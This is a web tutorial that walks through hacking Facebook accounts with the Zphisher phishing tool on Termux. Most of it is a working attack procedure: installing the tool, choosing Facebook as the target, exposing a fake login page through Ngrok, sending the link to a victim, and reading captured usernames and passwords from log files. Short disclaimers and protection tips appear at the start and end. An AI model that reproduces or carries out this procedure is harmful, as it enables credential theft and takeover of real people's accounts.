-modified.png){kind=small}
Disclaimer: This tutorial is for educational purposes only. The information shared here is meant to raise awareness about phishing techniques and how attackers operate. Misusing these tools to harm or spy on others is illegal and unethical.
What is Zphisher?
Zphisher is an open-source phishing tool built for Termux and Linux systems. It automates the creation of fake login pages for multiple services including Facebook, Instagram, Gmail, and more. Once hosted, these pages can be accessed via a link, and any credentials entered are captured locally on your device.
Features of Zphisher:
- No root required
- Simple command-line interface
- Supports over 30 popular sites
- Built-in tunneling via Ngrok or Serveo
Requirements
Before you start, make sure you have the following:
- An Android phone
- The Termux app (preferably from F-Droid)
- Internet connection
- Basic understanding of the command line
Step-by-Step Guide to Hack Facebook Using Termux and Zphisher
Step 1: Install Required Packages
First, update Termux and install required tools:
pkg update && pkg upgrade -y
pkg install git php curl openssh wget -yStep 2: Clone Zphisher Repository
git clone https://github.com/htr-tech/zphisher.git
cd zphisher
chmod +x zphisher.shStep 3: Launch Zphisher
bash zphisher.shYou’ll see a list of platforms to target. Choose:
1) FacebookStep 4: Select Tunneling Method
You’ll be asked how you want to expose the fake page to the internet:
1) Ngrok
2) Serveo.net
3) LocalhostSelect 1 for Ngrok. Make sure your mobile hotspot is on (especially for some ISPs).
Step 5: Get the Phishing Link
After a few seconds, Zphisher will generate a public link like:
https://fb-login.ngrok.ioThis is the link you would send to a target (again — only for testing or with permission).
Step 6: Wait for Login Data
If the user clicks the link and enters their Facebook credentials, you’ll immediately see this in your terminal:
[+] Username: victim@example.com
[+] Password: victimpassword123Step 7: View Stored Logs
All captured data is stored locally inside the zphisher folder. You can access it with:
cat usernames.txt
cat ip.txtTroubleshooting Common Issues
- Ngrok Not Working: Make sure hotspot is enabled. Some ISPs block tunneling.
- Blank Page Error: Restart Termux, run the script again.
- Ngrok Not Found: Download it manually using:
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip
unzip ngrok-stable-linux-arm.zip
chmod +x ngrok
mv ngrok $PREFIX/binWhy It’s Important to Understand This
Phishing is one of the most common cyberattack methods. Tools like Zphisher are used by attackers to trick users into giving up credentials. By learning how these tools work, you can:
- Recognize phishing attacks more easily
- Educate others about online safety
- Test your own security systems (with permission)
How to Protect Yourself from Phishing
- Never click unknown links
- Always check the URL carefully
- Enable 2FA (Two-Factor Authentication)
- Use a password manager
Is hacking a Facebook account with Zphisher legal?
No. Using Zphisher to hack accounts without permission is illegal and unethical. This tool is intended only for ethical hacking and educational use.
Do I need root access to run Zphisher on Termux?
No, Zphisher does not require root access. It runs smoothly on a non-rooted Android device using Termux.
Why is Ngrok not generating a link in Zphisher?
If Ngrok fails to generate a link, make sure your hotspot is turned on and you have a stable internet connection. Some ISPs block tunneling unless hotspot is active.
Can I use Serveo.net instead of Ngrok in Zphisher?
Yes, Serveo.net is an alternative tunneling method supported by Zphisher. However, it may not be as stable as Ngrok, and sometimes it's down or blocked.
Final Words
This article was written to expose how attackers trick users using phishing. We do not encourage or support hacking for malicious purposes. Use this knowledge to protect your accounts and educate others.
💡 Stay safe. Stay ethical. Always think before you click.
